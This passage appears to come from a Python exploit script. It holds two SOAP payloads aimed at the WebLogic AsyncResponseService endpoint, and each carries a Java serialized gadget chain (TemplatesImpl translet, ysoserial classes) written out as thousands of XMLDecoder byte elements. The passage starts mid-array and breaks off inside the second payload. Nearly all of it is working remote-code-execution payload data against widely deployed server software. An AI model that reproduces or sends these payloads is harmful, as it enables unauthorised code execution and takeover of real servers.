index="4969"><byte>118</byte></void><void index="4970"><byte>97</byte></void><void index="4971"><byte>120</byte></void><void index="4972"><byte>46</byte></void><void index="4973"><byte>120</byte></void><void index="4974"><byte>109</byte></void><void index="4975"><byte>108</byte></void><void index="4976"><byte>46</byte></void><void index="4977"><byte>116</byte></void><void index="4978"><byte>114</byte></void><void index="4979"><byte>97</byte></void><void index="4980"><byte>110</byte></void><void index="4981"><byte>115</byte></void><void index="4982"><byte>102</byte></void><void index="4983"><byte>111</byte></void><void index="4984"><byte>114</byte></void><void index="4985"><byte>109</byte></void><void index="4986"><byte>46</byte></void><void index="4987"><byte>84</byte></void><void index="4988"><byte>101</byte></void><void index="4989"><byte>109</byte></void><void index="4990"><byte>112</byte></void><void index="4991"><byte>108</byte></void><void index="4992"><byte>97</byte></void><void index="4993"><byte>116</byte></void><void index="4994"><byte>101</byte></void><void index="4995"><byte>115</byte></void><void index="4996"><byte>0</byte></void><void index="4997"><byte>0</byte></void><void index="4998"><byte>0</byte></void><void index="4999"><byte>0</byte></void><void index="5000"><byte>0</byte></void><void index="5001"><byte>0</byte></void><void index="5002"><byte>0</byte></void><void index="5003"><byte>0</byte></void><void index="5004"><byte>0</byte></void><void index="5005"><byte>0</byte></void><void index="5006"><byte>0</byte></void><void index="5007"><byte>120</byte></void><void index="5008"><byte>112</byte></void><void index="5009"><byte>120</byte></void></array>
</void>
</array>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
'''
payload2 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<array method="forName"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
<array class="byte" length="3478">
<void index="0"><byte>-84</byte></void>
<void index="1"><byte>-19</byte></void>
<void index="2"><byte>0</byte></void>
<void index="3"><byte>5</byte></void>
<void index="4"><byte>115</byte></void>
<void index="5"><byte>114</byte></void>
<void index="6"><byte>0</byte></void>
<void index="7"><byte>23</byte></void>
<void index="8"><byte>106</byte></void>
<void index="9"><byte>97</byte></void>
<void index="10"><byte>118</byte></void>
<void index="11"><byte>97</byte></void>
<void index="12"><byte>46</byte></void>
<void index="13"><byte>117</byte></void>
<void index="14"><byte>116</byte></void>
<void index="15"><byte>105</byte></void>
<void index="16"><byte>108</byte></void>
<void index="17"><byte>46</byte></void>
<void index="18"><byte>76</byte></void>
<void index="19"><byte>105</byte></void>
<void index="20"><byte>110</byte></void>
<void index="21"><byte>107</byte></void>
<void index="22"><byte>101</byte></void>
<void index="23"><byte>100</byte></void>
<void index="24"><byte>72</byte></void>
<void index="25"><byte>97</byte></void>
<void index="26"><byte>115</byte></void>
<void index="27"><byte>104</byte></void>
<void index="28"><byte>83</byte></void>
<void index="29"><byte>101</byte></void>
<void index="30"><byte>116</byte></void>
<void index="31"><byte>-40</byte></void>
<void index="32"><byte>108</byte></void>
<void index="33"><byte>-41</byte></void>
<void index="34"><byte>90</byte></void>
<void index="35"><byte>-107</byte></void>
<void index="36"><byte>-35</byte></void>
<void index="37"><byte>42</byte></void>
<void index="38"><byte>30</byte></void>
<void index="39"><byte>2</byte></void>
<void index="40"><byte>0</byte></void>
<void index="41"><byte>0</byte></void>
<void index="42"><byte>120</byte></void>
<void index="43"><byte>114</byte></void>
<void index="44"><byte>0</byte></void>
<void index="45"><byte>17</byte></void>
<void index="46"><byte>106</byte></void>
<void index="47"><byte>97</byte></void>
<void index="48"><byte>118</byte></void>
<void index="49"><byte>97</byte></void>
<void index="50"><byte>46</byte></void>
<void index="51"><byte>117</byte></void>
<void index="52"><byte>116</byte></void>
<void index="53"><byte>105</byte></void>
<void index="54"><byte>108</byte></void>
<void index="55"><byte>46</byte></void>
<void index="56"><byte>72</byte></void>
<void index="57"><byte>97</byte></void>
<void index="58"><byte>115</byte></void>
<void index="59"><byte>104</byte></void>
<void index="60"><byte>83</byte></void>
<void index="61"><byte>101</byte></void>
<void index="62"><byte>116</byte></void>
<void index="63"><byte>-70</byte></void>
<void index="64"><byte>68</byte></void>
<void index="65"><byte>-123</byte></void>
<void index="66"><byte>-107</byte></void>
<void index="67"><byte>-106</byte></void>
<void index="68"><byte>-72</byte></void>
<void index="69"><byte>-73</byte></void>
<void index="70"><byte>52</byte></void>
<void index="71"><byte>3</byte></void>
<void index="72"><byte>0</byte></void>
<void index="73"><byte>0</byte></void>
<void index="74"><byte>120</byte></void>
<void index="75"><byte>112</byte></void>
<void index="76"><byte>119</byte></void>
<void index="77"><byte>12</byte></void>
<void index="78"><byte>0</byte></void>
<void index="79"><byte>0</byte></void>
<void index="80"><byte>0</byte></void>
<void index="81"><byte>16</byte></void>
<void index="82"><byte>63</byte></void>
<void index="83"><byte>64</byte></void>
<void index="84"><byte>0</byte></void>
<void index="85"><byte>0</byte></void>
<void index="86"><byte>0</byte></void>
<void index="87"><byte>0</byte></void>
<void index="88"><byte>0</byte></void>
<void index="89"><byte>2</byte></void>
<void index="90"><byte>115</byte></void>
<void index="91"><byte>114</byte></void>
<void index="92"><byte>0</byte></void>
<void index="93"><byte>58</byte></void>
<void index="94"><byte>99</byte></void>
<void index="95"><byte>111</byte></void>
<void index="96"><byte>109</byte></void>
<void index="97"><byte>46</byte></void>
<void index="98"><byte>115</byte></void>
<void index="99"><byte>117</byte></void>
<void index="100"><byte>110</byte></void>
<void index="101"><byte>46</byte></void>
<void index="102"><byte>111</byte></void>
<void index="103"><byte>114</byte></void>
<void index="104"><byte>103</byte></void>
<void index="105"><byte>46</byte></void>
<void index="106"><byte>97</byte></void>
<void index="107"><byte>112</byte></void>
<void index="108"><byte>97</byte></void>
<void index="109"><byte>99</byte></void>
<void index="110"><byte>104</byte></void>
<void index="111"><byte>101</byte></void>
<void index="112"><byte>46</byte></void>
<void index="113"><byte>120</byte></void>
<void index="114"><byte>97</byte></void>
<void index="115"><byte>108</byte></void>
<void index="116"><byte>97</byte></void>
<void index="117"><byte>110</byte></void>
<void index="118"><byte>46</byte></void>
<void index="119"><byte>105</byte></void>
<void index="120"><byte>110</byte></void>
<void index="121"><byte>116</byte></void>
<void index="122"><byte>101</byte></void>
<void index="123"><byte>114</byte></void>
<void index="124"><byte>110</byte></void>
<void index="125"><byte>97</byte></void>
<void index="126"><byte>108</byte></void>
<void index="127"><byte>46</byte></void>
<void index="128"><byte>120</byte></void>
<void index="129"><byte>115</byte></void>
<void index="130"><byte>108</byte></void>
<void index="131"><byte>116</byte></void>
<void index="132"><byte>99</byte></void>
<void index="133"><byte>46</byte></void>
<void index="134"><byte>116</byte></void>
<void index="135"><byte>114</byte></void>
<void index="136"><byte>97</byte></void>
<void index="137"><byte>120</byte></void>
<void index="138"><byte>46</byte></void>
<void index="139"><byte>84</byte></void>
<void index="140"><byte>101</byte></void>
<void index="141"><byte>109</byte></void>
<void index="142"><byte>112</byte></void>
<void index="143"><byte>108</byte></void>
<void index="144"><byte>97</byte></void>
<void index="145"><byte>116</byte></void>
<void index="146"><byte>101</byte></void>
<void index="147"><byte>115</byte></void>
<void index="148"><byte>73</byte></void>
<void index="149"><byte>109</byte></void>
<void index="150"><byte>112</byte></void>
<void index="151"><byte>108</byte></void>
<void index="152"><byte>9</byte></void>
<void index="153"><byte>87</byte></void>
<void index="154"><byte>79</byte></void>
<void index="155"><byte>-63</byte></void>
<void index="156"><byte>110</byte></void>
<void index="157"><byte>-84</byte></void>
<void index="158"><byte>-85</byte></void>
<void index="159"><byte>51</byte></void>
<void index="160"><byte>3</byte></void>
<void index="161"><byte>0</byte></void>
<void index="162"><byte>6</byte></void>
<void index="163"><byte>73</byte></void>
<void index="164"><byte>0</byte></void>
<void index="165"><byte>13</byte></void>
<void index="166"><byte>95</byte></void>
<void index="167"><byte>105</byte></void>
<void index="168"><byte>110</byte></void>
<void index="169"><byte>100</byte></void>
<void index="170"><byte>101</byte></void>
<void index="171"><byte>110</byte></void>
<void index="172"><byte>116</byte></void>
<void index="173"><byte>78</byte></void>
<void index="174"><byte>117</byte></void>
<void index="175"><byte>109</byte></void>
<void index="176"><byte>98</byte></void>
<void index="177"><byte>101</byte></void>
<void index="178"><byte>114</byte></void>
<void index="179"><byte>73</byte></void>
<void index="180"><byte>0</byte></void>
<void index="181"><byte>14</byte></void>
<void index="182"><byte>95</byte></void>
<void index="183"><byte>116</byte></void>
<void index="184"><byte>114</byte></void>
<void index="185"><byte>97</byte></void>
<void index="186"><byte>110</byte></void>
<void index="187"><byte>115</byte></void>
<void index="188"><byte>108</byte></void>
<void index="189"><byte>101</byte></void>
<void index="190"><byte>116</byte></void>
<void index="191"><byte>73</byte></void>
<void index="192"><byte>110</byte></void>
<void index="193"><byte>100</byte></void>
<void index="194"><byte>101</byte></void>
<void index="195"><byte>120</byte></void>
<void index="196"><byte>91</byte></void>
<void index="197"><byte>0</byte></void>
<void index="198"><byte>10</byte></void>
<void index="199"><byte>95</byte></void>
<void index="200"><byte>98</byte></void>
<void index="201"><byte>121</byte></void>
<void index="202"><byte>116</byte></void>
<void index="203"><byte>101</byte></void>
<void index="204"><byte>99</byte></void>
<void index="205"><byte>111</byte></void>
<void index="206"><byte>100</byte></void>
<void index="207"><byte>101</byte></void>
<void index="208"><byte>115</byte></void>
<void index="209"><byte>116</byte></void>
<void index="210"><byte>0</byte></void>
<void index="211"><byte>3</byte></void>
<void index="212"><byte>91</byte></void>
<void index="213"><byte>91</byte></void>
<void index="214"><byte>66</byte></void>
<void index="215"><byte>91</byte></void>
<void index="216"><byte>0</byte></void>
<void index="217"><byte>6</byte></void>
<void index="218"><byte>95</byte></void>
<void index="219"><byte>99</byte></void>
<void index="220"><byte>108</byte></void>
<void index="221"><byte>97</byte></void>
<void index="222"><byte>115</byte></void>
<void index="223"><byte>115</byte></void>
<void index="224"><byte>116</byte></void>
<void index="225"><byte>0</byte></void>
<void index="226"><byte>18</byte></void>
<void index="227"><byte>91</byte></void>
<void index="228"><byte>76</byte></void>
<void index="229"><byte>106</byte></void>
<void index="230"><byte>97</byte></void>
<void index="231"><byte>118</byte></void>
<void index="232"><byte>97</byte></void>
<void index="233"><byte>47</byte></void>
<void index="234"><byte>108</byte></void>
<void index="235"><byte>97</byte></void>
<void index="236"><byte>110</byte></void>
<void index="237"><byte>103</byte></void>
<void index="238"><byte>47</byte></void>
<void index="239"><byte>67</byte></void>
<void index="240"><byte>108</byte></void>
<void index="241"><byte>97</byte></void>
<void index="242"><byte>115</byte></void>
<void index="243"><byte>115</byte></void>
<void index="244"><byte>59</byte></void>
<void index="245"><byte>76</byte></void>
<void index="246"><byte>0</byte></void>
<void index="247"><byte>5</byte></void>
<void index="248"><byte>95</byte></void>
<void index="249"><byte>110</byte></void>
<void index="250"><byte>97</byte></void>
<void index="251"><byte>109</byte></void>
<void index="252"><byte>101</byte></void>
<void index="253"><byte>116</byte></void>
<void index="254"><byte>0</byte></void>
<void index="255"><byte>18</byte></void>
<void index="256"><byte>76</byte></void>
<void index="257"><byte>106</byte></void>
<void index="258"><byte>97</byte></void>
<void index="259"><byte>118</byte></void>
<void index="260"><byte>97</byte></void>
<void index="261"><byte>47</byte></void>
<void index="262"><byte>108</byte></void>
<void index="263"><byte>97</byte></void>
<void index="264"><byte>110</byte></void>
<void index="265"><byte>103</byte></void>
<void index="266"><byte>47</byte></void>
<void index="267"><byte>83</byte></void>
<void index="268"><byte>116</byte></void>
<void index="269"><byte>114</byte></void>
<void index="270"><byte>105</byte></void>
<void index="271"><byte>110</byte></void>
<void index="272"><byte>103</byte></void>
<void index="273"><byte>59</byte></void>
<void index="274"><byte>76</byte></void>
<void index="275"><byte>0</byte></void>
<void index="276"><byte>17</byte></void>
<void index="277"><byte>95</byte></void>
<void index="278"><byte>111</byte></void>
<void index="279"><byte>117</byte></void>
<void index="280"><byte>116</byte></void>
<void index="281"><byte>112</byte></void>
<void index="282"><byte>117</byte></void>
<void index="283"><byte>116</byte></void>
<void index="284"><byte>80</byte></void>
<void index="285"><byte>114</byte></void>
<void index="286"><byte>111</byte></void>
<void index="287"><byte>112</byte></void>
<void index="288"><byte>101</byte></void>
<void index="289"><byte>114</byte></void>
<void index="290"><byte>116</byte></void>
<void index="291"><byte>105</byte></void>
<void index="292"><byte>101</byte></void>
<void index="293"><byte>115</byte></void>
<void index="294"><byte>116</byte></void>
<void index="295"><byte>0</byte></void>
<void index="296"><byte>22</byte></void>
<void index="297"><byte>76</byte></void>
<void index="298"><byte>106</byte></void>
<void index="299"><byte>97</byte></void>
<void index="300"><byte>118</byte></void>
<void index="301"><byte>97</byte></void>
<void index="302"><byte>47</byte></void>
<void index="303"><byte>117</byte></void>
<void index="304"><byte>116</byte></void>
<void index="305"><byte>105</byte></void>
<void index="306"><byte>108</byte></void>
<void index="307"><byte>47</byte></void>
<void index="308"><byte>80</byte></void>
<void index="309"><byte>114</byte></void>
<void index="310"><byte>111</byte></void>
<void index="311"><byte>112</byte></void>
<void index="312"><byte>101</byte></void>
<void index="313"><byte>114</byte></void>
<void index="314"><byte>116</byte></void>
<void index="315"><byte>105</byte></void>
<void index="316"><byte>101</byte></void>
<void index="317"><byte>115</byte></void>
<void index="318"><byte>59</byte></void>
<void index="319"><byte>120</byte></void>
<void index="320"><byte>112</byte></void>
<void index="321"><byte>0</byte></void>
<void index="322"><byte>0</byte></void>
<void index="323"><byte>0</byte></void>
<void index="324"><byte>0</byte></void>
<void index="325"><byte>-1</byte></void>
<void index="326"><byte>-1</byte></void>
<void index="327"><byte>-1</byte></void>
<void index="328"><byte>-1</byte></void>
<void index="329"><byte>117</byte></void>
<void index="330"><byte>114</byte></void>
<void index="331"><byte>0</byte></void>
<void index="332"><byte>3</byte></void>
<void index="333"><byte>91</byte></void>
<void index="334"><byte>91</byte></void>
<void index="335"><byte>66</byte></void>
<void index="336"><byte>75</byte></void>
<void index="337"><byte>-3</byte></void>
<void index="338"><byte>25</byte></void>
<void index="339"><byte>21</byte></void>
<void index="340"><byte>103</byte></void>
<void index="341"><byte>103</byte></void>
<void index="342"><byte>-37</byte></void>
<void index="343"><byte>55</byte></void>
<void index="344"><byte>2</byte></void>
<void index="345"><byte>0</byte></void>
<void index="346"><byte>0</byte></void>
<void index="347"><byte>120</byte></void>
<void index="348"><byte>112</byte></void>
<void index="349"><byte>0</byte></void>
<void index="350"><byte>0</byte></void>
<void index="351"><byte>0</byte></void>
<void index="352"><byte>2</byte></void>
<void index="353"><byte>117</byte></void>
<void index="354"><byte>114</byte></void>
<void index="355"><byte>0</byte></void>
<void index="356"><byte>2</byte></void>
<void index="357"><byte>91</byte></void>
<void index="358"><byte>66</byte></void>
<void index="359"><byte>-84</byte></void>
<void index="360"><byte>-13</byte></void>
<void index="361"><byte>23</byte></void>
<void index="362"><byte>-8</byte></void>
<void index="363"><byte>6</byte></void>
<void index="364"><byte>8</byte></void>
<void index="365"><byte>84</byte></void>
<void index="366"><byte>-32</byte></void>
<void index="367"><byte>2</byte></void>
<void index="368"><byte>0</byte></void>
<void index="369"><byte>0</byte></void>
<void index="370"><byte>120</byte></void>
<void index="371"><byte>112</byte></void>
<void index="372"><byte>0</byte></void>
<void index="373"><byte>0</byte></void>
<void index="374"><byte>8</byte></void>
<void index="375"><byte>-82</byte></void>
<void index="376"><byte>-54</byte></void>
<void index="377"><byte>-2</byte></void>
<void index="378"><byte>-70</byte></void>
<void index="379"><byte>-66</byte></void>
<void index="380"><byte>0</byte></void>
<void index="381"><byte>0</byte></void>
<void index="382"><byte>0</byte></void>
<void index="383"><byte>50</byte></void>
<void index="384"><byte>0</byte></void>
<void index="385"><byte>99</byte></void>
<void index="386"><byte>10</byte></void>
<void index="387"><byte>0</byte></void>
<void index="388"><byte>3</byte></void>
<void index="389"><byte>0</byte></void>
<void index="390"><byte>34</byte></void>
<void index="391"><byte>7</byte></void>
<void index="392"><byte>0</byte></void>
<void index="393"><byte>97</byte></void>
<void index="394"><byte>7</byte></void>
<void index="395"><byte>0</byte></void>
<void index="396"><byte>37</byte></void>
<void index="397"><byte>7</byte></void>
<void index="398"><byte>0</byte></void>
<void index="399"><byte>38</byte></void>
<void index="400"><byte>1</byte></void>
<void index="401"><byte>0</byte></void>
<void index="402"><byte>16</byte></void>
<void index="403"><byte>115</byte></void>
<void index="404"><byte>101</byte></void>
<void index="405"><byte>114</byte></void>
<void index="406"><byte>105</byte></void>
<void index="407"><byte>97</byte></void>
<void index="408"><byte>108</byte></void>
<void index="409"><byte>86</byte></void>
<void index="410"><byte>101</byte></void>
<void index="411"><byte>114</byte></void>
<void index="412"><byte>115</byte></void>
<void index="413"><byte>105</byte></void>
<void index="414"><byte>111</byte></void>
<void index="415"><byte>110</byte></void>
<void index="416"><byte>85</byte></void>
<void index="417"><byte>73</byte></void>
<void index="418"><byte>68</byte></void>
<void index="419"><byte>1</byte></void>
<void index="420"><byte>0</byte></void>
<void index="421"><byte>1</byte></void>
<void index="422"><byte>74</byte></void>
<void index="423"><byte>1</byte></void>
<void index="424"><byte>0</byte></void>
<void index="425"><byte>13</byte></void>
<void index="426"><byte>67</byte></void>
<void index="427"><byte>111</byte></void>
<void index="428"><byte>110</byte></void>
<void index="429"><byte>115</byte></void>
<void index="430"><byte>116</byte></void>
<void index="431"><byte>97</byte></void>
<void index="432"><byte>110</byte></void>
<void index="433"><byte>116</byte></void>
<void index="434"><byte>86</byte></void>
<void index="435"><byte>97</byte></void>
<void index="436"><byte>108</byte></void>
<void index="437"><byte>117</byte></void>
<void index="438"><byte>101</byte></void>
<void index="439"><byte>5</byte></void>
<void index="440"><byte>-83</byte></void>
<void index="441"><byte>32</byte></void>
<void index="442"><byte>-109</byte></void>
<void index="443"><byte>-13</byte></void>
<void index="444"><byte>-111</byte></void>
<void index="445"><byte>-35</byte></void>
<void index="446"><byte>-17</byte></void>
<void index="447"><byte>62</byte></void>
<void index="448"><byte>1</byte></void>
<void index="449"><byte>0</byte></void>
<void index="450"><byte>6</byte></void>
<void index="451"><byte>60</byte></void>
<void index="452"><byte>105</byte></void>
<void index="453"><byte>110</byte></void>
<void index="454"><byte>105</byte></void>
<void index="455"><byte>116</byte></void>
<void index="456"><byte>62</byte></void>
<void index="457"><byte>1</byte></void>
<void index="458"><byte>0</byte></void>
<void index="459"><byte>3</byte></void>
<void index="460"><byte>40</byte></void>
<void index="461"><byte>41</byte></void>
<void index="462"><byte>86</byte></void>
<void index="463"><byte>1</byte></void>
<void index="464"><byte>0</byte></void>
<void index="465"><byte>4</byte></void>
<void index="466"><byte>67</byte></void>
<void index="467"><byte>111</byte></void>
<void index="468"><byte>100</byte></void>
<void index="469"><byte>101</byte></void>
<void index="470"><byte>1</byte></void>
<void index="471"><byte>0</byte></void>
<void index="472"><byte>15</byte></void>
<void index="473"><byte>76</byte></void>
<void index="474"><byte>105</byte></void>
<void index="475"><byte>110</byte></void>
<void index="476"><byte>101</byte></void>
<void index="477"><byte>78</byte></void>
<void index="478"><byte>117</byte></void>
<void index="479"><byte>109</byte></void>
<void index="480"><byte>98</byte></void>
<void index="481"><byte>101</byte></void>
<void index="482"><byte>114</byte></void>
<void index="483"><byte>84</byte></void>
<void index="484"><byte>97</byte></void>
<void index="485"><byte>98</byte></void>
<void index="486"><byte>108</byte></void>
<void index="487"><byte>101</byte></void>
<void index="488"><byte>1</byte></void>
<void index="489"><byte>0</byte></void>
<void index="490"><byte>18</byte></void>
<void index="491"><byte>76</byte></void>
<void index="492"><byte>111</byte></void>
<void index="493"><byte>99</byte></void>
<void index="494"><byte>97</byte></void>
<void index="495"><byte>108</byte></void>
<void index="496"><byte>86</byte></void>
<void index="497"><byte>97</byte></void>
<void index="498"><byte>114</byte></void>
<void index="499"><byte>105</byte></void>
<void index="500"><byte>97</byte></void>
<void index="501"><byte>98</byte></void>
<void index="502"><byte>108</byte></void>
<void index="503"><byte>101</byte></void>
<void index="504"><byte>84</byte></void>
<void index="505"><byte>97</byte></void>
<void index="506"><byte>98</byte></void>
<void index="507"><byte>108</byte></void>
<void index="508"><byte>101</byte></void>
<void index="509"><byte>1</byte></void>
<void index="510"><byte>0</byte></void>
<void index="511"><byte>4</byte></void>
<void index="512"><byte>116</byte></void>
<void index="513"><byte>104</byte></void>
<void index="514"><byte>105</byte></void>
<void index="515"><byte>115</byte></void>
<void index="516"><byte>1</byte></void>
<void index="517"><byte>0</byte></void>
<void index="518"><byte>19</byte></void>
<void index="519"><byte>83</byte></void>
<void index="520"><byte>116</byte></void>
<void index="521"><byte>117</byte></void>
<void index="522"><byte>98</byte></void>
<void index="523"><byte>84</byte></void>
<void index="524"><byte>114</byte></void>
<void index="525"><byte>97</byte></void>
<void index="526"><byte>110</byte></void>
<void index="527"><byte>115</byte></void>
<void index="528"><byte>108</byte></void>
<void index="529"><byte>101</byte></void>
<void index="530"><byte>116</byte></void>
<void index="531"><byte>80</byte></void>
<void index="532"><byte>97</byte></void>
<void index="533"><byte>121</byte></void>
<void index="534"><byte>108</byte></void>
<void index="535"><byte>111</byte></void>
<void index="536"><byte>97</byte></void>
<void index="537"><byte>100</byte></void>
<void index="538"><byte>1</byte></void>
<void index="539"><byte>0</byte></void>
<void index="540"><byte>12</byte></void>
<void index="541"><byte>73</byte></void>
<void index="542"><byte>110</byte></void>
<void index="543"><byte>110</byte></void>
<void index="544"><byte>101</byte></void>
<void index="545"><byte>114</byte></void>
<void index="546"><byte>67</byte></void>
<void index="547"><byte>108</byte></void>
<void index="548"><byte>97</byte></void>
<void index="549"><byte>115</byte></void>
<void index="550"><byte>115</byte></void>
<void index="551"><byte>101</byte></void>
<void index="552"><byte>115</byte></void>
<void index="553"><byte>1</byte></void>
<void index="554"><byte>0</byte></void>
<void index="555"><byte>53</byte></void>
<void index="556"><byte>76</byte></void>
<void index="557"><byte>121</byte></void>
<void index="558"><byte>115</byte></void>
<void index="559"><byte>111</byte></void>
<void index="560"><byte>115</byte></void>
<void index="561"><byte>101</byte></void>
<void index="562"><byte>114</byte></void>
<void index="563"><byte>105</byte></void>
<void index="564"><byte>97</byte></void>
<void index="565"><byte>108</byte></void>
<void index="566"><byte>47</byte></void>
<void index="567"><byte>112</byte></void>
<void index="568"><byte>97</byte></void>
<void index="569"><byte>121</byte></void>
<void index="570"><byte>108</byte></void>
<void index="571"><byte>111</byte></void>
<void index="572"><byte>97</byte></void>
<void index="573"><byte>100</byte></void>
<void index="574"><byte>115</byte></void>
<void index="575"><byte>47</byte></void>
<void index="576"><byte>117</byte></void>
<void index="577"><byte>116</byte></void>
<void index="578"><byte>105</byte></void>
<void index="579"><byte>108</byte></void>
<void index="580"><byte>47</byte></void>
<void index="581"><byte>71</byte></void>
<void index="582"><byte>97</byte></void>
<void index="583"><byte>100</byte></void>
<void index="584"><byte>103</byte></void>
<void index="585"><byte>101</byte></void>
<void index="586"><byte>116</byte></void>
<void index="587"><byte>115</byte></void>
<void index="588"><byte>36</byte></void>
<void index="589"><byte>83</byte></void>
<void index="590"><byte>116</byte></void>
<void index="591"><byte>117</byte></void>
<void index="592"><byte>98</byte></void>
<void index="593"><byte>84</byte></void>
<void index="594"><byte>114</byte></void>
<void index="595"><byte>97</byte></void>
<void index="596"><byte>110</byte></void>
<void index="597"><byte>115</byte></void>
<void index="598"><byte>108</byte></void>
<void index="599"><byte>101</byte></void>
<void index="600"><byte>116</byte></void>
<void index="601"><byte>80</byte></void>
<void index="602"><byte>97</byte></void>
<void index="603"><byte>121</byte></void>
<void index="604"><byte>108</byte></void>
<void index="605"><byte>111</byte></void>
<void index="606"><byte>97</byte></void>
<void index="607"><byte>100</byte></void>
<void index="608"><byte>59</byte></void>
<void index="609"><byte>1</byte></void>
<void index="610"><byte>0</byte></void>
<void index="611"><byte>9</byte></void>
<void index="612"><byte>116</byte></void>
<void index="613"><byte>114</byte></void>
<void index="614"><byte>97</byte></void>
<void index="615"><byte>110</byte></void>
<void index="616"><byte>115</byte></void>
<void index="617"><byte>102</byte></void>
<void index="618"><byte>111</byte></void>
<void index="619"><byte>114</byte></void>
<void index="620"><byte>109</byte></void>
<void index="621"><byte>1</byte></void>
<void index="622"><byte>0</byte></void>
<void index="623"><byte>114</byte></void>
<void index="624"><byte>40</byte></void>
<void index="625"><byte>76</byte></void>
<void index="626"><byte>99</byte></void>
<void index="627"><byte>111</byte></void>
<void index="628"><byte>109</byte></void>
<void index="629"><byte>47</byte></void>
<void index="630"><byte>115</byte></void>
<void index="631"><byte>117</byte></void>
<void index="632"><byte>110</byte></void>
<void index="633"><byte>47</byte></void>
<void index="634"><byte>111</byte></void>
<void index="635"><byte>114</byte></void>
<void index="636"><byte>103</byte></void>
<void index="637"><byte>47</byte></void>
<void index="638"><byte>97</byte></void>
<void index="639"><byte>112</byte></void>
<void index="640"><byte>97</byte></void>
<void index="641"><byte>99</byte></void>
<void index="642"><byte>104</byte></void>
<void index="643"><byte>101</byte></void>
<void index="644"><byte>47</byte></void>
<void index="645"><byte>120</byte></void>
<void index="646"><byte>97</byte></void>
<void index="647"><byte>108</byte></void>
<void index="648"><byte>97</byte></void>
<void index="649"><byte>110</byte></void>
<void index="650"><byte>47</byte></void>
<void index="651"><byte>105</byte></void>
<void index="652"><byte>110</byte></void>
<void index="653"><byte>116</byte></void>
<void index="654"><byte>101</byte></void>
<void index="655"><byte>114</byte></void>
<void index="656"><byte>110</byte></void>
<void index="657"><byte>97</byte></void>
<void index="658"><byte>108</byte></void>
<void index="659"><byte>47</byte></void>
<void index="660"><byte>120</byte></void>
<void index="661"><byte>115</byte></void>
<void index="662"><byte>108</byte></void>
<void index="663"><byte>116</byte></void>
<void index="664"><byte>99</byte></void>
<void index="665"><byte>47</byte></void>
<void index="666"><byte>68</byte></void>
<void index="667"><byte>79</byte></void>
<void index="668"><byte>77</byte></void>
<void index="669"><byte>59</byte></void>
<void index="670"><byte>91</byte></void>
<void index="671"><byte>76</byte></void>
<void index="672"><byte>99</byte></void>
<void index="673"><byte>111</byte></void>
<void index="674"><byte>109</byte></void>
<void index="675"><byte>47</byte></void>
<void index="676"><byte>115</byte></void>
<void index="677"><byte>117</byte></void>
<void index="678"><byte>110</byte></void>
<void index="679"><byte>47</byte></void>
<void index="680"><byte>111</byte></void>
<void index="681"><byte>114</byte></void>
<void index="682"><byte>103</byte></void>
<void index="683"><byte>47</byte></void>
<void index="684"><byte>97</byte></void>
<void index="685"><byte>112</byte></void>
<void index="686"><byte>97</byte></void>
<void index="687"><byte>99</byte></void>
<void index="688"><byte>104</byte></void>
<void index="689"><byte>101</byte></void>
<void index="690"><byte>47</byte></void>
<void index="691"><byte>120</byte></void>
<void index="692"><byte>109</byte></void>
<void index="693"><byte>108</byte></void>
<void index="694"><byte>47</byte></void>
<void index="695"><byte>105</byte></void>
<void index="696"><byte>110</byte></void>
<void index="697"><byte>116</byte></void>
<void index="698"><byte>101</byte></void>
<void index="699"><byte>114</byte></void>
<void index="700"><byte>110</byte></void>
<void index="701"><byte>97</byte></void>
<void index="702"><byte>108</byte></void>
<void index="703"><byte>47</byte></void>
<void index="704"><byte>115</byte></void>
<void index="705"><byte>101</byte></void>
<void index="706"><byte>114</byte></void>
<void index="707"><byte>105</byte></void>
<void index="708"><byte>97</byte></void>
<void index="709"><byte>108</byte></void>
<void index="710"><byte>105</byte></void>
<void index="711"><byte>122</byte></void>
<void index="712"><byte>101</byte></void>
<void index="713"><byte>114</byte></void>
<void index="714"><byte>47</byte></void>
<void index="715"><byte>83</byte></void>
<void index="716"><byte>101</byte></void>
<void index="717"><byte>114</byte></void>
<void index="718"><byte>105</byte></void>
<void index="719"><byte>97</byte></void>
<void index="720"><byte>108</byte></void>
<void index="721"><byte>105</byte></void>
<void index="722"><byte>122</byte></void>
<void index="723"><byte>97</byte></void>
<void index="724"><byte>116</byte></void>
<void index="725"><byte>105</byte></void>
<void index="726"><byte>111</byte></void>
<void index="727"><byte>110</byte></void>
<void index="728"><byte>72</byte></void>
<void index="729"><byte>97</byte></void>
<void index="730"><byte>110</byte></void>
<void index="731"><byte>100</byte></void>
<void index="732"><byte>108</byte></void>
<void index="733"><byte>101</byte></void>
<void index="734"><byte>114</byte></void>
<void index="735"><byte>59</byte></void>
<void index="736"><byte>41</byte></void>
<void index="737"><byte>86</byte></void>
<void index="738"><byte>1</byte></void>
<void index="739"><byte>0</byte></void>
<void index="740"><byte>8</byte></void>
<void index="741"><byte>100</byte></void>
<void index="742"><byte>111</byte></void>
<void index="743"><byte>99</byte></void>
<void index="744"><byte>117</byte></void>
<void index="745"><byte>109</byte></void>
<void index="746"><byte>101</byte></void>
<void index="747"><byte>110</byte></void>
<void index="748"><byte>116</byte></void>
<void index="749"><byte>1</byte></void>
<void index="750"><byte>0</byte></void>
<void index="751"><byte>45</byte></void>
<void index="752"><byte>76</byte></void>
<void index="753"><byte>99</byte></void>
<void index="754"><byte>111</byte></void>
<void index="755"><byte>109</byte></void>
<void index="756"><byte>47</byte></void>
<void index="757"><byte>115</byte></void>
<void index="758"><byte>117</byte></void>
<void index="759"><byte>110</byte></void>
<void index="760"><byte>47</byte></void>
<void index="761"><byte>111</byte></void>
<void index="762"><byte>114</byte></void>
<void index="763"><byte>103</byte></void>
<void index="764"><byte>47</byte></void>
<void index="765"><byte>97</byte></void>
<void index="766"><byte>112</byte></void>
<void index="767"><byte>97</byte></void>
<void index="768"><byte>99</byte></void>
<void index="769"><byte>104</byte></void>
<void index="770"><byte>101</byte></void>
<void index="771"><byte>47</byte></void>
<void index="772"><byte>120</byte></void>
